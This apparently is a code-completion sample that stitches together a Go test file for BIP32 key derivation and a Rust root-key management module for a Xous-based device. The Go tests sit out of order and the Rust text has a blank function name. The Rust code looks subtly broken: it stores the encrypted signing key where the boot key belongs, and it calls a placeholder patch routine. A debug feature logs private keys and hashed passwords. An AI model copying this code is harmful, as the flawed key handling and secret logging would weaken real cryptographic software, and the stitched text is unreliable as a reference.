for _, testChildKey := range vector.children |
}
func TestPublicParentPublicChildDerivation(t *testing.T) {
// Generated using https://iancoleman.github.io/bip39/
// Root key:
// xprv9s21ZrQH143K2Cfj4mDZBcEecBmJmawReGwwoAou2zZzG45bM6cFPJSvobVTCB55L6Ld2y8RzC61CpvadeAnhws3CHsMFhNjozBKGNgucYm
// Derivation Path m/44'/60'/0'/0:
// xprv9zy5o7z1GMmYdaeQdmabWFhUf52Ytbpe3G5hduA4SghboqWe7aDGWseN8BJy1GU72wPjkCbBE1hvbXYqpCecAYdaivxjNnBoSNxwYD4wHpW
// xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u
extendedMasterPublic, err := B58Deserialize(
"xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u",
DefaultBip32Version)
assert.NoError(t, err)
expectedChildren := []testChildKey{
{pathFragment: 0, hexPubKey: "0243187e1a2ba9ba824f5f81090650c8f4faa82b7baf93060d10b81f4b705afd46"},
{pathFragment: 1, hexPubKey: "023790d11eb715c4320d8e31fba3a09b700051dc2cdbcce03f44b11c274d1e220b"},
{pathFragment: 2, hexPubKey: "0302c5749c3c75cea234878ae3f4d8f65b75d584bcd7ed0943b016d6f6b59a2bad"},
{pathFragment: 3, hexPubKey: "03f0440c94e5b14ea5b15875934597afff541bec287c6e65dc1102cafc07f69699"},
{pathFragment: 4, hexPubKey: "026419d0d8996707605508ac44c5871edc7fe206a79ef615b74f2eea09c5852e2b"},
{pathFragment: 5, hexPubKey: "02f63c6f195eea98bdb163c4a094260dea71d264b21234bed4df3899236e6c2298"},
{pathFragment: 6, hexPubKey: "02d74709cd522081064858f393d009ead5a0ecd43ede3a1f57befcc942025cb5f9"},
{pathFragment: 7, hexPubKey: "03e54bb92630c943d38bbd8a4a2e65fca7605e672d30a0e545a7198cbb60729ceb"},
{pathFragment: 8, hexPubKey: "027e9d5acd14d39c4938697fba388cd2e8f31fc1c5dc02fafb93a10a280de85199"},
{pathFragment: 9, hexPubKey: "02a167a9f0d57468fb6abf2f3f7967e2cadf574314753a06a9ef29bc76c54638d2"},
{pathFragment: 100, hexPubKey: "020db9ba00ddf68428e3f5bfe54252bbcd75b21e42f51bf3bfc4172bf0e5fa7905"},
{pathFragment: 101, hexPubKey: "0299e3790956570737d6164e6fcda5a3daa304065ca95ba46bc73d436b84f34d46"},
{pathFragment: 102, hexPubKey: "0202e0732c4c5d2b1036af173640e01957998cfd4f9cdaefab6ffe76eb869e2c59"},
{pathFragment: 103, hexPubKey: "03d050adbd996c0c5d737ff638402dfbb8c08e451fef10e6d62fb57887c1ac6cb2"},
{pathFragment: 104, hexPubKey: "038d466399e2d68b4b16043ad4d88893b3b2f84fc443368729a973df1e66f4f530"},
{pathFragment: 105, hexPubKey: "034811e2f0c8c50440c08c2c9799b99c911c036e877e8325386ff61723ae3ffdce"},
{pathFragment: 106, hexPubKey: "026339fd5842921888e711a6ba9104a5f0c94cc0569855273cf5faefdfbcd3cc29"},
{pathFragment: 107, hexPubKey: "02833705c1069fab2aa92c6b0dac27807290d72e9f52378d493ac44849ca003b22"},
{pathFragment: 108, hexPubKey: "032d2639bde1eb7bdf8444bd4f6cc26a9d1bdecd8ea15fac3b992c3da68d9d1df5"},
{pathFragment: 109, hexPubKey: "02479c6d4a64b93a2f4343aa862c938fbc658c99219dd7bebb4830307cbd76c9e9"},
}
for _, child := range expectedChildren {
pubKey, err := extendedMasterPublic.NewChildKey(child.pathFragment)
assert.NoError(t, err)
assert.False(t, pubKey.IsPrivate)
assert.Equal(t, child.hexPubKey, hex.EncodeToString(pubKey.Key))
}
}
func TestNewSeed(t *testing.T) {
for i := 0; i < 20; i++ {
seed, err := NewSeed()
assert.NoError(t, err)
assert.Equal(t, 256, len(seed))
}
}
func TestB58SerializeUnserialize(t *testing.T) {
tests := []struct {
seed []byte
base58 string
}{
{[]byte{}, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsMC"},
{[]byte{1}, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEC"},
{[]byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 0}, "xprv9s21ZrQH143K2hKT3jMKPFEcQLbx2XD55NtqQA7B4C5U9mTZY7gBeCdoFgurN4pxkQshzP8AQhBmUNgAo5djj5FzvUFh5pKH6wcRMSXVuc1"},
}
for _, test := range tests {
key, err := NewMasterKey(test.seed)
assert.NoError(t, err)
assertKeySerialization(t, key, test.base58)
}
}
func TestDeserializingInvalidStrings(t *testing.T) {
tests := []struct {
err error
base58 string
}{
{ErrSerializedKeyWrongSize, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsM"},
{ErrInvalidChecksum, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc"},
}
for _, test := range tests {
_, err := B58Deserialize(test.base58, DefaultBip32Version)
assert.Equal(t, test.err, err)
}
_, err := B58Deserialize("notbase58iiiiiIIIIIbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc",
DefaultBip32Version)
assert.NotNil(t, err)
}
func TestCantCreateHardenedPublicChild(t *testing.T) {
key, err := NewMasterKey([]byte{})
assert.NoError(t, err)
// Test that it works for private keys
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.NoError(t, err)
// Test that it throws an error for public keys if hardened
key = key.PublicKey()
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.Equal(t, ErrHardnedChildPublicKey, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.Equal(t, ErrHardnedChildPublicKey, err)
}
func assertKeySerialization(t *testing.T, key *Key, knownBase58 string) {
serializedBase58 := key.B58Serialize()
assert.Equal(t, knownBase58, serializedBase58)
unserializedBase58, err := B58Deserialize(serializedBase58, DefaultBip32Version)
assert.NoError(t, err)
assert.Equal(t, key, unserializedBase58)
}
| {
// Get the private key at the given key tree path
privKey, err = privKey.NewChildKey(testChildKey.pathFragment)
assert.NoError(t, err)
// Get this private key's public key
pubKey = privKey.PublicKey()
// Assert correctness
assert.Equal(t, testChildKey.privKey, privKey.String())
assert.Equal(t, testChildKey.pubKey, pubKey.String())
// Serialize and deserialize both keys and ensure they're the same
assertKeySerialization(t, privKey, testChildKey.privKey)
assertKeySerialization(t, pubKey, testChildKey.pubKey)
} | conditional_block |
implementation.rs | use gam::FONT_TOTAL_LEN;
use ticktimer_server::Ticktimer;
use utralib::generated::*;
use crate::api::*;
use core::num::NonZeroUsize;
use num_traits::*;
use gam::modal::{Modal, Slider};
use crate::bcrypt::*;
use crate::api::PasswordType;
use core::convert::TryInto;
use ed25519_dalek::{Keypair, Signature, Signer};
use engine_sha512::*;
use digest::Digest;
use graphics_server::BulkRead;
use core::mem::size_of;
use root_keys::key2bits::*;
// TODO: add hardware acceleration for BCRYPT so we can hit the OWASP target without excessive UX delay
const BCRYPT_COST: u32 = 7; // 10 is the minimum recommended by OWASP; takes 5696 ms to verify @ 10 rounds; 804 ms to verify 7 rounds
/// Size of the total area allocated for signatures. It is equal to the size of one FLASH sector, which is the smallest
/// increment that can be erased.
const SIGBLOCK_SIZE: u32 = 0x1000;
#[repr(C)]
struct SignatureInFlash {
pub version: u32,
pub signed_len: u32,
pub signature: [u8; 64],
}
struct KeyRomLocs {}
#[allow(dead_code)]
impl KeyRomLocs {
const FPGA_KEY: u8 = 0x00;
const SELFSIGN_PRIVKEY: u8 = 0x08;
const SELFSIGN_PUBKEY: u8 = 0x10;
const DEVELOPER_PUBKEY: u8 = 0x18;
const THIRDPARTY_PUBKEY: u8 = 0x20;
const USER_KEY: u8 = 0x28;
const PEPPER: u8 = 0xf8;
const FPGA_MIN_REV: u8 = 0xfc;
const LOADER_MIN_REV: u8 = 0xfd;
const CONFIG: u8 = 0xff;
}
pub struct KeyField {
mask: u32,
offset: u32,
}
impl KeyField {
pub const fn new(width: u32, offset: u32) -> Self {
let mask = (1 << width) - 1;
KeyField {
mask,
offset,
}
}
pub fn ms(&self, value: u32) -> u32 {
let ms_le = (value & self.mask) << self.offset;
ms_le.to_be()
}
}
#[allow(dead_code)]
pub(crate) mod keyrom_config {
use crate::KeyField;
pub const VERSION_MINOR: KeyField = KeyField::new(8, 0 );
pub const VERSION_MAJOR: KeyField = KeyField::new(8, 8 );
pub const DEVBOOT_DISABLE: KeyField = KeyField::new(1, 16);
pub const ANTIROLLBACK_ENA: KeyField = KeyField::new(1, 17);
pub const ANTIROLLFORW_ENA: KeyField = KeyField::new(1, 18);
pub const FORWARD_REV_LIMIT: KeyField = KeyField::new(4, 19);
pub const FORWARD_MINOR_LIMIT: KeyField = KeyField::new(4, 23);
pub const INITIALIZED: KeyField = KeyField::new(1, 27);
}
/// This structure is mapped into the password cache page and can be zero-ized at any time
/// we avoid using fancy Rust structures because everything has to "make sense" after a forced zero-ization
/// The "password" here is generated as follows:
/// `user plaintext (up to first 72 bytes) -> bcrypt (24 bytes) -> sha512trunc256 -> [u8; 32]`
/// The final sha512trunc256 expansion is because we will use this to XOR against secret keys stored in
/// the KEYROM that may be up to 256 bits in length. For shorter keys, the hashed password is simply truncated.
#[repr(C)]
struct PasswordCache {
hashed_boot_pw: [u8; 32],
hashed_boot_pw_valid: u32, // non-zero for valid
hashed_update_pw: [u8; 32],
hashed_update_pw_valid: u32,
}
pub(crate) struct RootKeys {
keyrom: utralib::CSR<u32>,
gateware: xous::MemoryRange,
staging: xous::MemoryRange,
loader_code: xous::MemoryRange,
kernel: xous::MemoryRange,
/// regions of RAM that holds all plaintext passwords, keys, and temp data. stuck in two well-defined page so we can
/// zero-ize it upon demand, without guessing about stack frames and/or Rust optimizers removing writes
sensitive_data: xous::MemoryRange, // this gets purged at least on every suspend, but ideally purged sooner than that
pass_cache: xous::MemoryRange, // this can be purged based on a policy, as set below
boot_password_policy: PasswordRetentionPolicy,
update_password_policy: PasswordRetentionPolicy,
cur_password_type: Option<PasswordType>, // for tracking which password we're dealing with at the UX layer
susres: susres::Susres, // for disabling suspend/resume
trng: trng::Trng,
gam: gam::Gam, // for raising UX elements directly
gfx: graphics_server::Gfx, // for reading out font planes for signing verification
spinor: spinor::Spinor,
}
impl RootKeys {
pub fn new(xns: &xous_names::XousNames) -> RootKeys {
let keyrom = xous::syscall::map_memory(
xous::MemoryAddress::new(utra::keyrom::HW_KEYROM_BASE),
None,
4096,
xous::MemoryFlags::R | xous::MemoryFlags::W,
)
.expect("couldn't map keyrom CSR range");
// read-only memory maps. even if we don't refer to them, we map them into our process
// so that no other processes can claim them
let gateware = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_MAIN_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_MAIN_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC gateware region");
let staging = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_STAGING_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_STAGING_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC staging region");
let loader_code = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::LOADER_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::LOADER_CODE_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the loader code region");
let kernel = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::KERNEL_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::KERNEL_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the kernel region");
let sensitive_data = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let pass_cache = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let spinor = spinor::Spinor::new(&xns).expect("couldn't connect to spinor server");
spinor.register_soc_token().expect("couldn't register rootkeys as the one authorized writer to the gateware update area!");
let keys = RootKeys {
keyrom: CSR::new(keyrom.as_mut_ptr() as *mut u32),
gateware,
staging,
loader_code,
kernel,
sensitive_data,
pass_cache,
update_password_policy: PasswordRetentionPolicy::AlwaysPurge,
boot_password_policy: PasswordRetentionPolicy::AlwaysKeep,
cur_password_type: None,
susres: susres::Susres::new_without_hook(&xns).expect("couldn't connect to susres without hook"),
trng: trng::Trng::new(&xns).expect("couldn't connect to TRNG server"),
gam: gam::Gam::new(&xns).expect("couldn't connect to GAM"),
gfx: graphics_server::Gfx::new(&xns).expect("couldn't connect to gfx"),
spinor
};
keys
}
fn purge_password(&mut self, pw_type: PasswordType) {
unsafe {
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
match pw_type {
PasswordType::Boot => {
for p in (*pcache_ptr).hashed_boot_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_boot_pw_valid = 0;
}
PasswordType::Update => {
for p in (*pcache_ptr).hashed_update_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_update_pw_valid = 0;
}
}
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
fn purge_sensitive_data(&mut self) {
let data = self.sensitive_data.as_slice_mut::<u32>();
for d in data.iter_mut() {
*d = 0;
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
pub fn suspend(&mut self) {
match self.boot_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Boot);
}
}
match self.update_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Update);
}
}
self.purge_sensitive_data();
}
pub fn resume(&mut self) {
}
pub fn update_policy(&mut self, policy: Option<PasswordRetentionPolicy>) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected policy update from the UX");
return;
};
if let Some(p) = policy {
match pw_type {
PasswordType::Boot => self.boot_password_policy = p,
PasswordType::Update => self.update_password_policy = p,
};
} else {
match pw_type {
PasswordType::Boot => PasswordRetentionPolicy::AlwaysPurge,
PasswordType::Update => PasswordRetentionPolicy::AlwaysPurge,
};
}
// once the policy has been set, revert the current type to None
self.cur_password_type = None;
}
/// Plaintext password is passed as a &str. Any copies internally are destroyed. Caller is responsible for destroying the &str original.
/// Performs a bcrypt hash of the password, with the currently set salt; does not store the plaintext after exit.
pub fn hash_and_save_password(&mut self, pw: &str) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected password from the UX");
return;
};
let mut hashed_password: [u8; 24] = [0; 24];
let mut salt = self.get_salt();
// we change the salt ever-so-slightly for every password. This doesn't make any one password more secure;
// but it disallows guessing all the passwords with a single off-the-shelf hashcat run.
salt[0] ^= pw_type as u8;
let timer = ticktimer_server::Ticktimer::new().expect("couldn't connect to ticktimer");
// the bcrypt function takes the plaintext password and makes one copy to prime the blowfish bcrypt
// cipher. It is responsible for erasing this state.
let start_time = timer.elapsed_ms();
bcrypt(BCRYPT_COST, &salt, pw, &mut hashed_password); // note: this internally makes a copy of the password, and destroys it
let elapsed = timer.elapsed_ms() - start_time;
log::info!("bcrypt cost: {} time: {}ms", BCRYPT_COST, elapsed); // benchmark to figure out how to set cost parameter
// expand the 24-byte (192-bit) bcrypt result into 256 bits, so we can use it directly as XOR key material
// against 256-bit AES and curve25519 keys
// for such a small hash, software is the most performant choice
let mut hasher = engine_sha512::Sha512Trunc256::new(Some(engine_sha512::FallbackStrategy::SoftwareOnly));
hasher.update(hashed_password);
let digest = hasher.finalize();
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
unsafe {
match pw_type {
PasswordType::Boot => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_boot_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_boot_pw_valid = 1;
}
PasswordType::Update => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_update_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_update_pw_valid = 1;
}
}
}
}
/// Reads a 256-bit key at a given index offset
fn read_key_256(&mut self, index: u8) -> [u8; 32] {
let mut key: [u8; 32] = [0; 32];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Reads a 128-bit key at a given index offset
fn read_key_128(&mut self, index: u8) -> [u8; 16] {
let mut key: [u8; 16] = [0; 16];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Returns the `salt` needed for the `bcrypt` routine.
/// This routine handles the special-case of being unitialized: in that case, we need to get
/// salt from a staging area, and not our KEYROM. However, `setup_key_init` must be called
/// first to ensure that the staging area has a valid salt.
fn get_salt(&mut self) -> [u8; 16] {
if !self.is_initialized() {
// we're not initialized, use the salt that should already be in the staging area
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
let mut key: [u8; 16] = [0; 16];
for (word, &keyword) in key.chunks_mut(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter()) {
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
} else {
self.read_key_128(KeyRomLocs::PEPPER)
}
}
/// Called by the UX layer to track which password we're currently requesting
pub fn set_ux_password_type(&mut self, cur_type: Option<PasswordType>) {
self.cur_password_type = cur_type;
}
/// Called by the UX layer to check which password request is in progress
pub fn get_ux_password_type(&self) -> Option<PasswordType> {self.cur_password_type}
pub fn is_initialized(&mut self) -> bool {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
if config & keyrom_config::INITIALIZED.ms(1) != 0 {
true
} else {
false
}
}
/// Called by the UX layer to set up a key init run. It disables suspend/resume for the duration
/// of the run, and also sets up some missing fields of KEYROM necessary to encrypt passwords.
pub fn setup_key_init(&mut self) {
// block suspend/resume ops during security-sensitive operations
self.susres.set_suspendable(false).expect("couldn't block suspend/resume");
// in this block, keyrom data is copied into RAM.
// make a copy of the KEYROM to hold the new mods, in the sensitive data area
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for addr in 0..256 {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, addr);
sensitive_slice[addr as usize] = self.keyrom.rf(utra::keyrom::DATA_DATA);
}
// provision the pepper
for keyword in sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter_mut() {
*keyword = self.trng.get_u32().expect("couldn't get random number");
}
}
/// Core of the key initialization routine. Requires a `progress_modal` dialog box that has been set
/// up with the appropriate notification messages by the UX layer, and a `Slider` type action which
/// is used to report the progress of the initialization routine. We assume the `Slider` box is set
/// up to report progress on a range of 0-100%.
///
/// This routine dispatches the following activities:
/// - generate signing private key (encrypted with update password)
/// - generate rootkey (encrypted with boot password)
/// - generate signing public key
/// - set the init bit
/// - sign the loader
/// - sign the kernel
/// - compute the patch set for the FPGA bitstream
/// - do the patch (whatever that means - gotta deal with the AES key, HMAC etc.)
/// - verify the FPGA image hmac
/// - sign the FPGA image
/// - get ready for a reboot
/// - returns true if we should reboot (everything succeeded)
/// - returns false if we had an error condition (don't reboot)
pub fn do_key_init(&mut self, progress_modal: &mut Modal, progress_action: &mut Slider) -> bool {
// kick the progress bar to indicate we've entered the routine
update_progress(1, progress_modal, progress_action);
let keypair: Keypair = Keypair::generate(&mut self.trng);
// pub key is easy, no need to encrypt
let public_key: [u8; ed25519_dalek::PUBLIC_KEY_LENGTH] = keypair.public.to_bytes();
{ // scope sensitive_slice narrowly, as it borrows *self mutably, and can mess up later calls that borrow an immutable self
// sensitive_slice is our staging area for the new keyrom contents
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in public_key.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PUBKEY as usize..KeyRomLocs::SELFSIGN_PUBKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
// extract the update password key from the cache, and apply it to the private key
let pcache: &PasswordCache = unsafe{&*(self.pass_cache.as_mut_ptr() as *mut PasswordCache)};
#[cfg(feature = "hazardous-debug")]
{
log::info!("cached boot passwords {:x?}", pcache.hashed_boot_pw);
log::info!("cached update password: {:x?}", pcache.hashed_update_pw);
}
// private key must XOR with password before storing
let mut private_key_enc: [u8; ed25519_dalek::SECRET_KEY_LENGTH] = [0; ed25519_dalek::SECRET_KEY_LENGTH];
// we do this from to try and avoid making as few copies of the hashed password as possible
for (dst, (plain, key)) in
private_key_enc.iter_mut()
.zip(keypair.secret.to_bytes().iter()
.zip(pcache.hashed_update_pw.iter())) {
*dst = plain ^ key;
}
// store the private key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in private_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PRIVKEY as usize..KeyRomLocs::SELFSIGN_PRIVKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(10, progress_modal, progress_action);
// generate and store a root key (aka boot key), this is what is unlocked by the "boot password"
// ironically, it's a "lower security" key because it just acts as a gatekeeper to further
// keys that would have a stronger password applied to them, based upon the importance of the secret
// think of this more as a user PIN login confirmation, than as a significant cryptographic event
let mut boot_key_enc: [u8; 32] = [0; 32];
for (dst, key) in
boot_key_enc.chunks_mut(4).into_iter()
.zip(pcache.hashed_boot_pw.chunks(4).into_iter()) {
let key_word = self.trng.get_u32().unwrap().to_be_bytes();
// just unroll this loop, it's fast and easy enough
(*dst)[0] = key[0] ^ key_word[0];
(*dst)[1] = key[1] ^ key_word[1];
(*dst)[2] = key[2] ^ key_word[2];
(*dst)[3] = key[3] ^ key_word[3];
// also note that interestingly, we don't have to XOR it with the hashed boot password --
// this key isn't used by this routine, just initialized, so really, it only matters to
// XOR it with the password when you use it the first time to encrypt something.
}
// store the boot key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in private_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::USER_KEY as usize..KeyRomLocs::USER_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(20, progress_modal, progress_action);
// sign the loader
let (loader_sig, loader_len) = self.sign_loader(&keypair);
update_progress(30, progress_modal, progress_action);
// sign the kernel
let (kernel_sig, kernel_len) = self.sign_kernel(&keypair);
update_progress(40, progress_modal, progress_action);
// encrypt the FPGA key using the update password. in an un-init system, it is provided to us in plaintext format
// e.g. in the case that we're doing a BBRAM boot (eFuse flow would give us a 0's key and we'd later on set it)
#[cfg(feature = "hazardous-debug")]
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key before encryption: ");
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (word, key_word) in sensitive_slice[KeyRomLocs::FPGA_KEY as usize..KeyRomLocs::FPGA_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()
.zip(pcache.hashed_update_pw.chunks(4).into_iter()) {
*word = *word ^ u32::from_be_bytes(key_word.try_into().unwrap());
}
}
update_progress(50, progress_modal, progress_action);
// set the "init" bit in the staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
sensitive_slice[KeyRomLocs::CONFIG as usize] |= keyrom_config::INITIALIZED.ms(1);
}
update_progress(60, progress_modal, progress_action);
#[cfg(feature = "hazardous-debug")]
{
log::info!("Self private key: {:x?}", keypair.secret.to_bytes());
log::info!("Self public key: {:x?}", keypair.public.to_bytes());
self.debug_staging();
}
// Because we're initializing keys for the *first* time, make a backup copy of the bitstream to
// the staging area. Note that if we're doing an update, the update target would already be
// in the staging area, so this step should be skipped.
self.make_gateware_backup(60, 70, progress_modal, progress_action);
// compute the keyrom patch set for the bitstream
// at this point the KEYROM as replicated in sensitive_slice should have all its assets in place
patch::should_patch(42);
// finalize the progress bar on exit -- always leave at 100%
update_progress(100, progress_modal, progress_action);
true
}
fn make_gateware_backup(&mut self, prog_start: u32, prog_end: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
// println!("this is a test of stdlib");
}
#[cfg(feature = "hazardous-debug")]
fn | (&self) {
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PRIVKEY as usize, 256, "Self private key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PUBKEY as usize, 256, "Self public key: ");
self.debug_print_key(KeyRomLocs::DEVELOPER_PUBKEY as usize, 256, "Dev public key: ");
self.debug_print_key(KeyRomLocs::THIRDPARTY_PUBKEY as usize, 256, "3rd party public key: ");
self.debug_print_key(KeyRomLocs::USER_KEY as usize, 256, "Boot key: ");
self.debug_print_key(KeyRomLocs::PEPPER as usize, 128, "Pepper: ");
self.debug_print_key(KeyRomLocs::CONFIG as usize, 32, "Config (as BE): ");
}
#[cfg(feature = "hazardous-debug")]
fn debug_print_key(&self, offset: usize, num_bits: usize, name: &str) {
use core::fmt::Write;
let mut debugstr = xous_ipc::String::<4096>::new();
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
write!(debugstr, "{}", name).unwrap();
for word in sensitive_slice[offset .. offset as usize + num_bits/(size_of::<u32>()*8)].iter() {
for byte in word.to_be_bytes().iter() {
write!(debugstr, "{:02x}", byte).unwrap();
}
}
log::info!("{}", debugstr);
}
pub fn sign_loader(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let loader_len =
xous::LOADER_CODE_LEN
- SIGBLOCK_SIZE
+ graphics_server::fontmap::FONT_TOTAL_LEN as u32
+ 8; // two u32 words are appended to the end, which repeat the "version" and "length" fields encoded in the signature block
// this is a huge hash, so, get a hardware hasher, even if it means waiting for it
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let loader_region = self.loader_code.as_slice::<u8>();
// the loader data starts one page in; the first page is reserved for the signature itself
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
// now get the font plane data
self.gfx.bulk_read_restart(); // reset the bulk read pointers on the gfx side
let bulkread = BulkRead::default();
let mut buf = xous_ipc::Buffer::into_buf(bulkread).expect("couldn't transform bulkread into aligned buffer");
// this form of loop was chosen to avoid the multiple re-initializations and copies that would be entailed
// in our usual idiom for pasing buffers around. instead, we create a single buffer, and re-use it for
// every iteration of the loop.
loop {
buf.lend_mut(self.gfx.conn(), self.gfx.bulk_read_fontmap_op()).expect("couldn't do bulkread from gfx");
let br = buf.as_flat::<BulkRead, _>().unwrap();
hasher.update(&br.buf[..br.len as usize]);
if br.len != bulkread.buf.len() as u32 {
log::trace!("non-full block len: {}", br.len);
}
if br.len < bulkread.buf.len() as u32 {
// read until we get a buffer that's not fully filled
break;
}
}
if false { // this path is for debugging the loader hash. It spoils the loader signature in the process.
let digest = hasher.finalize();
log::info!("len: {}", loader_len);
log::info!("{:x?}", digest);
// fake hasher for now
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
} else {
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
}
}
pub fn sign_kernel(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let kernel_region = self.kernel.as_slice::<u8>();
// for the kernel length, we can't know/trust the given length in the signature field, so we sign the entire
